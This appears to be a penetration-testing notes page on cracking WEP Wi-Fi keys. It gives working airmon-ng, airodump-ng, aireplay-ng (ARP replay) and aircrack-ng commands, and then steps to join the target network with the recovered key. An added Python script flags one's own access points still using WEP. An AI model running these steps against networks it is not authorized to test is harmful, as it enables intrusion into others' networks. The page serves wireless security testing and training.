# Attack WEP

Ref:

{% embed url="https://github.com/ricardojoserf/wifi-pentesting-guide?tab=readme-ov-file#3" %}

1. **Start Monitor mode:**

```
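# start monitor mode (airmon-ng typically renames the interface to wlan0mon)
sudo airmon-ng start wlan0

# stop monitor mode (do this before connecting to the Wi-Fi)
sudo airmon-ng stop wlan0mon

# list nearby networks, including their WPS information
sudo airodump-ng wlan0mon --wps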
```

2. **Start capturing traffic from the target AP:**

```
# -c: AP channel, --bssid: AP MAC address, -w: output file prefix
sudo airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w capture_WEP wlan0mon
```

In parallel, run an ARP request replay attack (`aireplay-ng -3`):

```
# -b takes the AP's BSSID (MAC address), not the SSID name
sudo aireplay-ng -3 -b $AP_MAC -h $STATION_MAC wlan0mon
```

3. **Crack the WEP key:**

```
# airodump-ng appends a sequence number to the -w prefix
sudo aircrack-ng capture_WEP-01.cap
```
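
Defender-side counterpart to the steps above, as an added example (not from the original page or the referenced guide): it reads the `.csv` file that airodump-ng's `-w` option writes next to the `.cap` and reports which of your own access points still advertise WEP. The function name, the sample data and the BSSID inventory are constructed for illustration.

```python
import csv

# Constructed sample in the layout of an airodump-ng "-w" CSV file:
# an access-point table, a blank line, then a station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP,    ,  -40,      120,      900,   0.  0.  0.  0,   9, lab-guest,
00:11:22:33:44:66, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2, CCMP, PSK,  -52,      118,        0,   0.  0.  0.  0,   8, lab-corp,
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WEP , WEP,    ,  -70,       40,       10,   0.  0.  0.  0,   8, neighbor,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -45, 300, 00:11:22:33:44:55,
"""


def find_owned_wep_aps(csv_text, owned_bssids):
    """Return (bssid, essid, channel) for each owned AP that advertises WEP."""
    owned = {b.strip().upper() for b in owned_bssids}
    header, findings = None, []
    for row in csv.reader(csv_text.splitlines()):
        cells = [c.strip() for c in row]
        if not cells or not cells[0]:
            continue                      # blank separator line
        if cells[0] == "BSSID":
            header = cells                # start of the access-point table
            continue
        if cells[0] == "Station MAC":
            break                         # station table is not needed here
        if header is None or len(cells) < len(header):
            continue                      # truncated or unexpected row
        bssid = cells[0].upper()
        privacy = cells[header.index("Privacy")].upper().split()
        if bssid in owned and "WEP" in privacy:
            # An ESSID containing commas spills into extra cells; rejoin them.
            start = header.index("ESSID")
            essid = ",".join(cells[start:len(cells) - 1])
            findings.append((bssid, essid, cells[header.index("channel")]))
    return findings


if __name__ == "__main__":
    mine = ["00:11:22:33:44:55", "00:11:22:33:44:66"]  # constructed inventory
    for bssid, essid, channel in find_owned_wep_aps(SAMPLE_CSV, mine):
        print(f"WEP still enabled: {essid} ({bssid}) on channel {channel}")
```

Any access point it reports should be moved to WPA2 or WPA3, since the steps on this page recover a WEP key from captured traffic alone.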

***

After cracking, you can connect to the Wi-Fi network directly, either through the UI or from the terminal as shown below:

{% hint style="info" %}
Make sure to **stop** monitor mode before connecting.
{% endhint %}

```
sudo iwconfig wlan0 essid <target SSID Name> key <hexKey>

# refresh the DHCP configuration
sudo dhclient wlan0
```

Stuck?

<https://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html>

<http://www.onnocenter.or.id/wiki/index.php/Attacks:_WEP_Cracking,_WPA_Handshake_Capture>

<https://www.youtube.com/watch?v=e667NA3aPqY>
